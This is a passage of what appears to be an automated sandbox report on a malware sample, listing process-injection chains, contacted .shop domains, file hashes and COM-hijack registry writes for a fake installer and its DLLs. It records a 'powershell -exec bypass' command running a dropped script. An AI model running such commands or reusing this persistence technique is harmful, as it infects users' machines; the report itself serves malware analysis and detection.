PID 2308 wrote to memory of 492 N/A C:\Users\Admin\AppData\Local\Temp\Set-up.exe C:\Windows\SysWOW64\more.com
PID 492 wrote to memory of 2772 N/A C:\Windows\SysWOW64\more.com C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 492 wrote to memory of 2772 N/A C:\Windows\SysWOW64\more.com C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 492 wrote to memory of 2772 N/A C:\Windows\SysWOW64\more.com C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 492 wrote to memory of 2772 N/A C:\Windows\SysWOW64\more.com C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 492 wrote to memory of 2772 N/A C:\Windows\SysWOW64\more.com C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 2772 wrote to memory of 2928 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2772 wrote to memory of 2928 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2772 wrote to memory of 2928 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2772 wrote to memory of 2928 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 492 wrote to memory of 2772 N/A C:\Windows\SysWOW64\more.com C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 2772 wrote to memory of 2340 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe C:\Users\Admin\AppData\Roaming\9A2VOZ.pif
PID 2772 wrote to memory of 2340 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe C:\Users\Admin\AppData\Roaming\9A2VOZ.pif
PID 2772 wrote to memory of 2340 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe C:\Users\Admin\AppData\Roaming\9A2VOZ.pif
PID 2772 wrote to memory of 2340 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe C:\Users\Admin\AppData\Roaming\9A2VOZ.pif
PID 2340 wrote to memory of 1720 N/A C:\Users\Admin\AppData\Roaming\9A2VOZ.pif C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 2340 wrote to memory of 1720 N/A C:\Users\Admin\AppData\Roaming\9A2VOZ.pif C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 2340 wrote to memory of 1720 N/A C:\Users\Admin\AppData\Roaming\9A2VOZ.pif C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 2340 wrote to memory of 1720 N/A C:\Users\Admin\AppData\Roaming\9A2VOZ.pif C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 2340 wrote to memory of 1472 N/A C:\Users\Admin\AppData\Roaming\9A2VOZ.pif C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 2340 wrote to memory of 1472 N/A C:\Users\Admin\AppData\Roaming\9A2VOZ.pif C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 2340 wrote to memory of 1472 N/A C:\Users\Admin\AppData\Roaming\9A2VOZ.pif C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 2340 wrote to memory of 1472 N/A C:\Users\Admin\AppData\Roaming\9A2VOZ.pif C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 2340 wrote to memory of 2692 N/A C:\Users\Admin\AppData\Roaming\9A2VOZ.pif C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 2340 wrote to memory of 2692 N/A C:\Users\Admin\AppData\Roaming\9A2VOZ.pif C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 2340 wrote to memory of 2692 N/A C:\Users\Admin\AppData\Roaming\9A2VOZ.pif C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 2340 wrote to memory of 2692 N/A C:\Users\Admin\AppData\Roaming\9A2VOZ.pif C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 2340 wrote to memory of 2952 N/A C:\Users\Admin\AppData\Roaming\9A2VOZ.pif C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 2340 wrote to memory of 2952 N/A C:\Users\Admin\AppData\Roaming\9A2VOZ.pif C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 2340 wrote to memory of 2952 N/A C:\Users\Admin\AppData\Roaming\9A2VOZ.pif C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 2340 wrote to memory of 2952 N/A C:\Users\Admin\AppData\Roaming\9A2VOZ.pif C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 2340 wrote to memory of 632 N/A C:\Users\Admin\AppData\Roaming\9A2VOZ.pif C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 2340 wrote to memory of 632 N/A C:\Users\Admin\AppData\Roaming\9A2VOZ.pif C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 2340 wrote to memory of 632 N/A C:\Users\Admin\AppData\Roaming\9A2VOZ.pif C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 2340 wrote to memory of 632 N/A C:\Users\Admin\AppData\Roaming\9A2VOZ.pif C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 2340 wrote to memory of 1284 N/A C:\Users\Admin\AppData\Roaming\9A2VOZ.pif C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 2340 wrote to memory of 1284 N/A C:\Users\Admin\AppData\Roaming\9A2VOZ.pif C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 2340 wrote to memory of 1284 N/A C:\Users\Admin\AppData\Roaming\9A2VOZ.pif C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 2340 wrote to memory of 1284 N/A C:\Users\Admin\AppData\Roaming\9A2VOZ.pif C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 2340 wrote to memory of 1828 N/A C:\Users\Admin\AppData\Roaming\9A2VOZ.pif C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 2340 wrote to memory of 1828 N/A C:\Users\Admin\AppData\Roaming\9A2VOZ.pif C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 2340 wrote to memory of 3028 N/A C:\Users\Admin\AppData\Roaming\9A2VOZ.pif C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 2340 wrote to memory of 2964 N/A C:\Users\Admin\AppData\Roaming\9A2VOZ.pif C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 2340 wrote to memory of 1296 N/A C:\Users\Admin\AppData\Roaming\9A2VOZ.pif C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 2340 wrote to memory of 3032 N/A C:\Users\Admin\AppData\Roaming\9A2VOZ.pif C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 2340 wrote to memory of 3040 N/A C:\Users\Admin\AppData\Roaming\9A2VOZ.pif C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Processes

C:\Users\Admin\AppData\Local\Temp\Set-up.exe

"C:\Users\Admin\AppData\Local\Temp\Set-up.exe"

C:\Windows\SysWOW64\more.com

C:\Windows\SysWOW64\more.com

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -exec bypass -f "C:\Users\Admin\AppData\Local\Temp\3O6QTUU1MR033UWI6MBVM5Z.ps1"

C:\Users\Admin\AppData\Roaming\9A2VOZ.pif

"C:\Users\Admin\AppData\Roaming\9A2VOZ.pif" "C:\Users\Admin\AppData\Roaming\N67EEG.xlsx"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 mindfuljournal.shop udp
US 104.21.79.92:443 mindfuljournal.shop tcp
US 8.8.8.8:53 cdn1.pixel-story.shop udp
US 172.67.185.54:443 cdn1.pixel-story.shop tcp
US 8.8.8.8:53 pixelpalette.shop udp
US 104.21.84.104:443 pixelpalette.shop tcp

Files

C:\Users\Admin\AppData\Local\Temp\c44e025e

MD5 51ce6bb7811c2cb519df4248405e4724
SHA1 237195ac7a01b2db385b09ebad099c77ee9780e7
SHA256 c07ff059a3774eb806e8c74eaba95e64ba4768cae00335a9eb9bd350ee220deb
SHA512 c2cb5517d2e568db6adff52abfa6c99ef6993392cb54616765e5a0e90d57468a53c36e83af96baf030c6b4d6b9d3dde549e60ba73527f18161a6b203aa2b2347

C:\Users\Admin\AppData\Local\Temp\3O6QTUU1MR033UWI6MBVM5Z.ps1

MD5 a93ef812fcdf3af24ff8b33a75d4992e
SHA1 b282892bd321a8709474f43d790d7e661edaa98f
SHA256 d5a89ca10e0e354df724efa955616b27501534cd5153f3c387c9d569a73cdbc6
SHA512 272da3e9cb498541454f381d360e4dd47498ecf1f604844dcaea21316a3f37547688f52439d38bb6208f513ba8fc9e442b82cbb622c6579323530c342853b037

\Users\Admin\AppData\Roaming\9A2VOZ.pif

MD5 3f58a517f1f4796225137e7659ad2adb
SHA1 e264ba0e9987b0ad0812e5dd4dd3075531cfe269
SHA256 1da298cab4d537b0b7b5dabf09bff6a212b9e45731e0cc772f99026005fb9e48
SHA512 acf740aafce390d06c6a76c84e7ae7c0f721731973aadbe3e57f2eb63241a01303cc6bf11a3f9a88f8be0237998b5772bdaf569137d63ba3d0f877e7d27fc634

C:\Users\Admin\AppData\Roaming\N67EEG.xlsx

MD5 3c6d0866e54ab391bc09713fde4c9d38
SHA1 a1a4e9c067e3c85739e85fb45f7ecdb363bcf856
SHA256 ffe15bff44969541749b01e1ab80492c95990bf4af35fb62e0d93bf6a4b81682
SHA512 eebf8ca2e3d778ca9706276b26c4d3daedf9cb7067d695cbf9e07755e6887e782d25a8aa6785034052b39105518c69f7e09b12c8199e58d13fcaf6b7f82b58b4

Analysis: behavioral7

Detonation Overview

Submitted

2024-11-13 15:17

Reported

2024-11-13 15:20

Platform

win7-20241010-en

Max time kernel

118s

Max time network

123s

Command Line

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\msncore.dll

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\regsvr32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2520 wrote to memory of 2524 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe

Processes

C:\Windows\system32\regsvr32.exe

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\msncore.dll

C:\Windows\SysWOW64\regsvr32.exe

/s C:\Users\Admin\AppData\Local\Temp\msncore.dll

Network

N/A

Files

N/A

Analysis: behavioral12

Detonation Overview

Submitted

2024-11-13 15:17

Reported

2024-11-13 15:20

Platform

win10v2004-20241007-en

Max time kernel

92s

Max time network

140s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\access\libfilesystem_plugin.dll,#1

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3580 wrote to memory of 3216 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\access\libfilesystem_plugin.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\access\libfilesystem_plugin.dll,#1

Network

Files

N/A

Analysis: behavioral22

Detonation Overview

Submitted

2024-11-13 15:17

Reported

2024-11-13 15:20

Platform

win10v2004-20241007-en

Max time kernel

93s

Max time network

140s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\codec\libd3d11va_plugin.dll,#1

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 5052 wrote to memory of 2868 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\codec\libd3d11va_plugin.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\codec\libd3d11va_plugin.dll,#1

Network

Files

N/A

Analysis: behavioral25

Detonation Overview

Submitted

2024-11-13 15:17

Reported

2024-11-13 15:20

Platform

win7-20240903-en

Max time kernel

121s

Max time network

122s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\video_output\libdirect3d9_plugin.dll,#1

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\video_output\libdirect3d9_plugin.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\video_output\libdirect3d9_plugin.dll,#1

Network

N/A

Files

N/A

Analysis: behavioral26

Detonation Overview

Submitted

2024-11-13 15:17

Reported

2024-11-13 15:20

Platform

win10v2004-20241007-en

Max time kernel

94s

Max time network

137s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\video_output\libdirect3d9_plugin.dll,#1

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4144 wrote to memory of 4328 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\video_output\libdirect3d9_plugin.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\video_output\libdirect3d9_plugin.dll,#1

Network

Files

N/A

Analysis: behavioral30

Detonation Overview

Submitted

2024-11-13 15:17

Reported

2024-11-13 15:20

Platform

win10v2004-20241007-en

Max time kernel

90s

Max time network

143s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\video_output\libvmem_plugin.dll,#1

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3100 wrote to memory of 2284 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\video_output\libvmem_plugin.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\video_output\libvmem_plugin.dll,#1

Network

Files

N/A

Analysis: behavioral10

Detonation Overview

Submitted

2024-11-13 15:17

Reported

2024-11-13 15:20

Platform

win10v2004-20241007-en

Max time kernel

148s

Max time network

151s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\msvcr80.dll,#1

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3056 wrote to memory of 1776 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\msvcr80.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\msvcr80.dll,#1

Network

Files

N/A

Analysis: behavioral13

Detonation Overview

Submitted

2024-11-13 15:17

Reported

2024-11-13 15:21

Platform

win7-20241010-en

Max time kernel

121s

Max time network

129s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\access\libimem_plugin.dll,#1

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2876 wrote to memory of 2316 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\access\libimem_plugin.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\access\libimem_plugin.dll,#1

Network

N/A

Files

N/A

Analysis: behavioral19

Detonation Overview

Submitted

2024-11-13 15:17

Reported

2024-11-13 15:20

Platform

win7-20240903-en

Max time kernel

119s

Max time network

121s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\codec\libavcodec_plugin.dll,#1

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2084 wrote to memory of 1688 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\codec\libavcodec_plugin.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\codec\libavcodec_plugin.dll,#1

Network

N/A

Files

N/A

Analysis: behavioral21

Detonation Overview

Submitted

2024-11-13 15:17

Reported

2024-11-13 15:20

Platform

win7-20241010-en

Max time kernel

117s

Max time network

121s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\codec\libd3d11va_plugin.dll,#1

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2224 wrote to memory of 2380 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\codec\libd3d11va_plugin.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\codec\libd3d11va_plugin.dll,#1

Network

N/A

Files

N/A

Analysis: behavioral4

Detonation Overview

Submitted

2024-11-13 15:17

Reported

2024-11-13 15:20

Platform

win10v2004-20241007-en

Max time kernel

92s

Max time network

145s

Command Line

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\contactsUX.dll

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\regsvr32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 100 wrote to memory of 464 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe

Processes

C:\Windows\system32\regsvr32.exe

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\contactsUX.dll

C:\Windows\SysWOW64\regsvr32.exe

/s C:\Users\Admin\AppData\Local\Temp\contactsUX.dll

Network

Files

N/A

Analysis: behavioral5

Detonation Overview

Submitted

2024-11-13 15:17

Reported

2024-11-13 15:20

Platform

win7-20240903-en

Max time kernel

121s

Max time network

122s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\msidcrl40.dll,#1

Signatures

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\rundll32.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\msidcrl40.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\msidcrl40.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2244 -s 268

Network

N/A

Files

N/A

Analysis: behavioral9

Detonation Overview

Submitted

2024-11-13 15:17

Reported

2024-11-13 15:20

Platform

win7-20240903-en

Max time kernel

122s

Max time network

127s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\msvcr80.dll,#1

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2956 wrote to memory of 2256 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\msvcr80.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\msvcr80.dll,#1

Network

N/A

Files

N/A

Analysis: behavioral14

Detonation Overview

Submitted

2024-11-13 15:17

Reported

2024-11-13 15:20

Platform

win10v2004-20241007-en

Max time kernel

92s

Max time network

145s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\access\libimem_plugin.dll,#1

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3416 wrote to memory of 4176 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\access\libimem_plugin.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\access\libimem_plugin.dll,#1

Network

Files

N/A

Analysis: behavioral27

Detonation Overview

Submitted

2024-11-13 15:17

Reported

2024-11-13 15:20

Platform

win7-20241010-en

Max time kernel

121s

Max time network

130s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\video_output\libdrawable_plugin.dll,#1

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2280 wrote to memory of 1116 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\video_output\libdrawable_plugin.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\video_output\libdrawable_plugin.dll,#1

Network

N/A

Files

N/A

Analysis: behavioral28

Detonation Overview

Submitted

2024-11-13 15:17

Reported

2024-11-13 15:20

Platform

win10v2004-20241007-en

Max time kernel

92s

Max time network

151s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\video_output\libdrawable_plugin.dll,#1

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2716 wrote to memory of 2372 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\video_output\libdrawable_plugin.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\video_output\libdrawable_plugin.dll,#1

Network

Country Destination Domain Proto

Files

N/A

Analysis: behavioral20

Detonation Overview

Submitted

2024-11-13 15:17

Reported

2024-11-13 15:20

Platform

win10v2004-20241007-en

Max time kernel

93s

Max time network

154s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\codec\libavcodec_plugin.dll,#1

Signatures

System Location Discovery: System Language Discovery

discovery

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4224 wrote to memory of 3988 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 4224 wrote to memory of 3988 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 4224 wrote to memory of 3988 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\codec\libavcodec_plugin.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\codec\libavcodec_plugin.dll,#1

Network

Country Destination Domain Proto

Files

N/A

Analysis: behavioral32

Detonation Overview

Submitted

2024-11-13 15:17

Reported

2024-11-13 15:20

Platform

win10v2004-20241007-en

Max time kernel

92s

Max time network

151s

Command Line

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\updater\nvdisps.dll

Signatures

Event Triggered Execution: Component Object Model Hijacking

persistence privilege_escalation

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.VideoHDCPStatus C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.ServerMain\CurVer C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{91363F1E-E7CA-4959-85D6-963719EC79FC}\AppID C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.NameDisp C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.DualView.1\CLSID C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.ColorSettingsAdv.1 C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{7945F814-7BFB-4506-A113-2BD66CDC713A}\InprocServer32 C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.TVWizard\CurVer C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{AAB8F985-EADA-428B-8636-270F58E1F1EF}\ = "VideoAudioControl Class" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{73BCA54E-6AEB-4597-8F27-E1284FF12722}\InprocServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\updater\\nvdisps.dll" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.ColorCorrection\CurVer\ = "DisplayServer.ColorCorrection.1" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{26A37DC6-935D-439B-80DD-C1006AE13D71}\InprocServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\updater\\nvdisps.dll" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6E4B938E-4BA1-4E8D-BCBA-8C51CE95F94F}\VersionIndependentProgID\ = "DisplayServer.MultiMon" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CC0648AE-7E85-483C-B1DB-9335C9D6F8C7}\AppID C:\Windows\system32\regsvr32.exe N/A
